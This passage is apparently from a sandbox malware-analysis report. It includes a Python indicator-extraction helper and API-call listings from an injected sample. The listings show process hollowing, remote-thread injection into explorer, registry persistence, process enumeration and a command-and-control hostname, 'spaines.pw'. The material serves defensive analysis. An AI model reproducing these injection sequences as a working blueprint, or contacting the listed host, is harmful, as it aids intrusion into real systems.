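                continue  # unresolved or plain numeric argument
            if arg.startswith("/"):
                iocs["url_paths"].add(arg)  # URI path handed to the request builder
            elif DOMAIN.match(arg):
                iocs["domains"].add(arg)  # C2 hostname
        first = call["args"][0] if call["args"] else ""
        if call["api"] == "Sleep" and HEX_ARG.match(first):
            iocs["sleep_ms"].append(int(first, 16))  # dwMilliseconds
        if call["api"] == "CreateToolhelp32Snapshot" and HEX_ARG.match(first):
            iocs["snapshot_flags"].append(int(first, 16))  # 0x2 is TH32CS_SNAPPROCESS
        if call["module"] == "WS2_32":
            iocs["net_apis"].append(call["api"])  # Winsock calls in listing order
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

The eight-hex-digit filter does most of the work: every numeric argument in these listings is printed that way, so anything else that is not "?" is a string the sandbox could resolve and is worth a look. Treat the hostname as an indicator together with the context the report already gives (it is passed to lstrlen at 03392F53 directly before the send/recv subcall, and recv at 03393030 reads into a 0x00A00000-byte buffer), and do not take the order of send, recv and closesocket as more than listing order.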

Control-flow Graph
APIs
• ExpandEnvironmentStringsA.KERNELBASE(03392525,00000010,?,?,033929F8,00000104), ref: 0339253A
  • Part of subcall function 03392572: lstrcat.KERNEL32(033929F8,03392553), ref: 0339257A
  • Part of subcall function 03392572: lstrcat.KERNEL32(033929F8,00000000), ref: 0339258D
• ExpandEnvironmentStringsA.KERNEL32(033925BB,0000000B,?,00000000,03392634,00000104), ref: 033925CB
• lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
                                                                                                                                                                • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2903145849-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)

APIs
• lstrcat.KERNEL32(00000000,03392A0B), ref: 03392A1A
  • Part of subcall function 03392B4D: inet_addr.WS2_32(00000000), ref: 03392BDA
  • Part of subcall function 03392B4D: gethostbyname.WS2_32(00000000), ref: 03392BEE
  • Part of subcall function 03392B4D: Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 03392C44
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392A94
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 03392B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: DeleteFile$Sleep$gethostbynameinet_addrlstrcat
• String ID:
• API String ID: 1642945479-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)

APIs
• inet_addr.WS2_32(00000000), ref: 03392BDA
• gethostbyname.WS2_32(00000000), ref: 03392BEE
• Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 03392C44
Strings
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Sleepgethostbynameinet_addr
• String ID: spaines.pw
• API String ID: 4125869991-3306378189
Uniqueness
Uniqueness Score: -1.00%

APIs
• inet_addr.WS2_32(00000000), ref: 03392BDA
• gethostbyname.WS2_32(00000000), ref: 03392BEE
• Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 03392C44
Strings
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Sleepgethostbynameinet_addr
• String ID: spaines.pw
• API String ID: 4125869991-3306378189
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0339086E: RegCreateKeyExA.KERNELBASE(00000000,03390840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 03390876
  • Part of subcall function 0339086E: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 0339089D
  • Part of subcall function 0339086E: RegCloseKey.KERNELBASE(?), ref: 033908A9
• CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 03390900
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Create$CloseThreadValue
• String ID:
• API String ID: 711899537-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindWindowA.USER32(03390B57,0000000E), ref: 03390B6A
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 03390B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 03390B84
  • Part of subcall function 03390DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,03390D88,00000000,0000090B,00000000), ref: 03390E06
  • Part of subcall function 03390DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 03390E24
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 03390BA6
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWrite
• String ID:
• API String ID: 3233011861-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0339269E
• GetFileSize.KERNEL32(?,00000000), ref: 033926B7
• ReadFile.KERNELBASE(0339298A,?,00000000,?,00000000), ref: 033926DB
• CloseHandle.KERNEL32(0339298A), ref: 033926EC
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 03392715
• SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 03392732
• WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0339274E
• CloseHandle.KERNEL32(?), ref: 0339275F
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 03391372
• VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 03391387
• VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 033913E5
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 03390B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 03390B84
  • Part of subcall function 03390DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,03390D88,00000000,0000090B,00000000), ref: 03390E06
  • Part of subcall function 03390DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 03390E24
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 03390BA6
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Process$AllocExitMemoryOpenThreadVirtualWindowWrite
• String ID:
• API String ID: 2938372061-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCreateKeyExA.KERNELBASE(00000000,03390840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 03390876
• RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 0339089D
• RegCloseKey.KERNELBASE(?), ref: 033908A9
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 03390643: CreateMutexA.KERNELBASE(00000000,00000000), ref: 0339065A
  • Part of subcall function 03390643: LoadLibraryA.KERNELBASE(03390673,00000009,?,00000000), ref: 03390681
  • Part of subcall function 03390643: lstrcmpiA.KERNEL32(?,00000000), ref: 033906EB
  • Part of subcall function 03390643: Sleep.KERNELBASE(00001388), ref: 033906FE
  • Part of subcall function 03390643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
  • Part of subcall function 03390643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
  • Part of subcall function 03390643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390752
  • Part of subcall function 03390643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390764
  • Part of subcall function 03390643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390785
• CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 03390900
  • Part of subcall function 03390CE8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03390D07
  • Part of subcall function 03390CE8: Sleep.KERNELBASE(000003E8), ref: 03390D1D
  • Part of subcall function 03390CE8: Process32First.KERNEL32(?,00000000), ref: 03390D3D
  • Part of subcall function 03390CE8: FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 03390D88
  • Part of subcall function 03390CE8: Process32Next.KERNEL32(?,?), ref: 03390D9E
  • Part of subcall function 03390CE8: FindCloseChangeNotification.KERNELBASE(?), ref: 03390DCA
  • Part of subcall function 03390CE8: Sleep.KERNELBASE(000003E8), ref: 03390DD5
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Create$DirectorySleep$AttributesChangeCloseFileFindNotificationProcess32$FirstLibraryLoadMutexNextSnapshotThreadToolhelp32lstrcmpi
• String ID:
• API String ID: 4243289212-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,03392DA0,0000002F,?,00000000,00000001,F0000000), ref: 03392DE0
• CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 03392E06
• CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 03392E29
• CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 03392E43
• CryptVerifySignatureA.ADVAPI32(?,03392A30,03392A2C,?,00000000,00000000), ref: 03392E63
• CryptDestroyHash.ADVAPI32(?), ref: 03392E71
• CryptDestroyKey.ADVAPI32(?), ref: 03392E7D
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 03392E8B
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportInfoPublicReleaseSignatureVerify
• String ID:
• API String ID: 295346115-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00001388), ref: 03390959
• RtlExitUserThread.NTDLL(00000000), ref: 03390961
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 03390981
• GetStartupInfoA.KERNEL32(00000000), ref: 03390999
  • Part of subcall function 033909D9: CreateProcessA.KERNEL32(00000000,033909D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 033909E0
  • Part of subcall function 033909D9: GetThreadContext.KERNEL32(?,00000000), ref: 03390A08
  • Part of subcall function 033909D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 03390A33
  • Part of subcall function 033909D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,03395810,00000000,00000000,00000002), ref: 03390A78
  • Part of subcall function 033909D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 03390AA6
  • Part of subcall function 033909D9: ResumeThread.KERNEL32(?), ref: 03390AB6
  • Part of subcall function 033909D9: Sleep.KERNEL32(000003E8), ref: 03390AC6
  • Part of subcall function 033909D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 03390ADD
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
                                                                                                                                                                • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1099281029-0
                                                                                                                                                                • Opcode ID: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                • Instruction ID: 1f53164439c3b245fb970c75176261bb947708fbd6863543f9909df13ca610c2
                                                                                                                                                                • Opcode Fuzzy Hash: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                • Instruction Fuzzy Hash: 71518231644354AFFF169F20CCC5B9A77BCAF04744F0801DABA45FE0D6DAB09594CAA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 033934A2
• lstrcat.KERNEL32(00000000,033934AD), ref: 033934B1
• Process32Next.KERNEL32(00000000,00000000), ref: 033934C2
• lstrlen.KERNEL32(00000000), ref: 033934CD
  • Part of subcall function 0339276C: VirtualAlloc.KERNEL32(00000000,03E80005,00003000,00000004,?,00000000), ref: 03392787
  • Part of subcall function 0339276C: lstrcat.KERNEL32(00000000,033927D1), ref: 033927E0
  • Part of subcall function 0339276C: VirtualFree.KERNEL32(-00000005,00000000,00008000,00000000,-00000005,03E80005,00000004,?,00000000), ref: 03392805
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,000000C9), ref: 033934E7
• CloseHandle.KERNEL32(00000000), ref: 033934EE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Virtuallstrcat$Free$AllocCloseHandleNextProcess32lstrlen
• String ID: W
• API String ID: 1406046206-655174618
• Opcode ID: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
• Instruction ID: ef3ec26e5c51c7c41206fbc71775e80153d0f7335f2cf358adfcd1693d21f08e
• Opcode Fuzzy Hash: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
• Instruction Fuzzy Hash: 04F08175104500AEFB136F208CC8FBE3ABCAF41715F040099FD45FD059CB7441558A69
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,033909D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 033909E0
• GetThreadContext.KERNEL32(?,00000000), ref: 03390A08
• VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 03390A33
• DuplicateHandle.KERNEL32(000000FF,000000FF,?,03395810,00000000,00000000,00000002), ref: 03390A78
• WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 03390AA6
• ResumeThread.KERNEL32(?), ref: 03390AB6
• Sleep.KERNEL32(000003E8), ref: 03390AC6
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 03390ADD
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
• String ID:
• API String ID: 617592159-0
• Opcode ID: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
• Instruction ID: 5fa828bd603870724301637b747acb45afb63b0c151a8cd82c3295db3e432ae2
• Opcode Fuzzy Hash: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
• Instruction Fuzzy Hash: 79312B316402159FFF269F14CCC5BAA77BCAF04744F080195AA49FE0E5DBB09694CEA4
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 03392597: lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
• lstrcat.KERNEL32(00000000,00000000), ref: 033931EA
  • Part of subcall function 033926F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 03392715
  • Part of subcall function 033926F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 03392732
  • Part of subcall function 033926F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0339274E
  • Part of subcall function 033926F9: CloseHandle.KERNEL32(?), ref: 0339275F
• GetStartupInfoA.KERNEL32(00000000), ref: 03393228
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,033931B5,00000011,?,00000000,00000000), ref: 03393255
• CloseHandle.KERNEL32(?,?,033931B5,00000011,?,00000000,00000000,00000000,0339306E,00000004,00000000), ref: 03393261
• CloseHandle.KERNEL32(?,?,033931B5,00000011,?,00000000,00000000,00000000,0339306E,00000004,00000000), ref: 0339326D
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: CloseFileHandle$Createlstrcat$InfoPointerProcessStartupWrite
• String ID:
• API String ID: 1477093598-0
• Opcode ID: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
• Instruction ID: 18192be59e4bdb8bded702a23b36eefa29096d51947df12ba4608cc4d2e563f5
• Opcode Fuzzy Hash: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
• Instruction Fuzzy Hash: 571127B6804918EFEF12AF60CC84B9F77BDEF40305F0549AAE586EA014DA345A90CE55
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0339344D
• Process32First.KERNEL32(00000000,00000000), ref: 03393473
• VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 0339348B
• lstrcat.KERNEL32(00000000,00000000), ref: 033934A2
• CloseHandle.KERNEL32(00000000), ref: 033934EE
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: AllocCloseCreateFirstHandleProcess32SnapshotToolhelp32Virtuallstrcat
• String ID:
• API String ID: 1167326197-0
• Opcode ID: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
• Instruction ID: 0d84ba828c66bdfe04a1925697b2baa3f49373fc768df1c99f24d61c978887fb
• Opcode Fuzzy Hash: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
• Instruction Fuzzy Hash: 410147B0101200EFFF239A208C88BA976EC9F00720F0800A9BD44EE0C5DF74C4518564
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,03393F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 03393F2D
• Sleep.KERNEL32(000003E8,00000000,?,03393F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 03393F4B
• Sleep.KERNEL32(000007D0), ref: 03393F5B
• Sleep.KERNEL32(00000BB8), ref: 03393F6B
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
• Instruction ID: 608faa6d4a59d422dba8757afc2ce219da828422d74a7053479ca400b37f6c07
• Opcode Fuzzy Hash: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
• Instruction Fuzzy Hash: 32F01CBCD88340EAFF40BBB48CC965977B8AF40755F040692AA8BAD4D4DE7489508E75
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(03393EBD,00000006,E8FFFE1B,00000000), ref: 03393EC8
• GetModuleHandleA.KERNEL32(00000000,00000000,?,03393F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 03393F2D
  • Part of subcall function 03390C9C: GetProcAddress.KERNEL32(03392811,0339290A), ref: 03390CA9
Strings
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: j
• API String ID: 310444273-2747090070
• Opcode ID: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
• Instruction ID: fc3617a0d43bdae87a995d0787c129ae117b5ad2a86ac9b76662c10f64149c01
• Opcode Fuzzy Hash: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
• Instruction Fuzzy Hash: 75F044FD944344EDFF11FA708CC4BAAB3BCAF40655F044157A987DD040DE308940CAA6
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:7.9%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:2.6%
                                                                                                                                                                Total number of Nodes:193
                                                                                                                                                                Total number of Limit Nodes:20

Control-flow Graph

APIs
• VirtualAllocEx.KERNELBASE ref: 01341FDE
• WriteProcessMemory.KERNEL32 ref: 01342000
• CreateRemoteThread.KERNEL32 ref: 01342028
Strings
Memory Dump Source
• Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
Similarity
• API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
• String ID: @
• API String ID: 1718980022-2766056989
• Opcode ID: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
• Instruction ID: 5dfa931b168189c6da55d443e70d6d7ed06949fb25be811420ce0b21a591a078
• Opcode Fuzzy Hash: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
• Instruction Fuzzy Hash: CF118F3120C9084FE748EA1CE80D76577DAF7D8325F25436EE44ED3295DE3899168785
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• NtQueryDirectoryFile.NTDLL ref: 013422E1
Memory Dump Source
• Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
Similarity
• API ID: DirectoryFileQuery
• String ID:
• API String ID: 3295332484-0
• Opcode ID: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
• Instruction ID: 7a9b81688a2db40c8f5b847e09044eeb72262b630aeddaae26f61545e25466d0
• Opcode Fuzzy Hash: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
• Instruction Fuzzy Hash: 2C411530608A4E8FDF95EF1CD884BAA7BF4FB69359F40016AF909D7210D730E8848B41
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
• Instruction ID: 32af6664475258df2025926b18748e272a5399bca74b2e2a3e5bffc18d134367
• Opcode Fuzzy Hash: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
• Instruction Fuzzy Hash: 30114C74908A8C8FDFC4EF6CC488A697BE0FB68355F54062AB859C32A0D775D8948B41
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: fe543ba5981a4b2cd0a471ec537e1e9909e24de02a6f2c7c72e786ac4512fa1f
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: C821E730A34C1D0BFB68A27C9859764F6D2E79C320F980295E90DD36E4ED58DCC183C6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2916329205.0000000001370000.00000040.00000400.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1370000_explorer.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: ea8e8263a52ffd1b72090123e7935646c661fcb3b5f8d857c32fcc52ac9d5973
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 463159720102057FEF257F748D86ABA7FACEF12318F040166BD85DE0A1EA384954CBB6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
Similarity
• API ID: ExitThreadUser
• String ID:
• API String ID: 3424019298-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: f828dda867ed27b1dc25a4f885b7e8e46b830c7295b4a0c4c789bd2f8f5b16ba
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 7C313672110205AFFB057B749D86AFA3FECEF10318F040165BE85DA0A6EA306994CAB5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
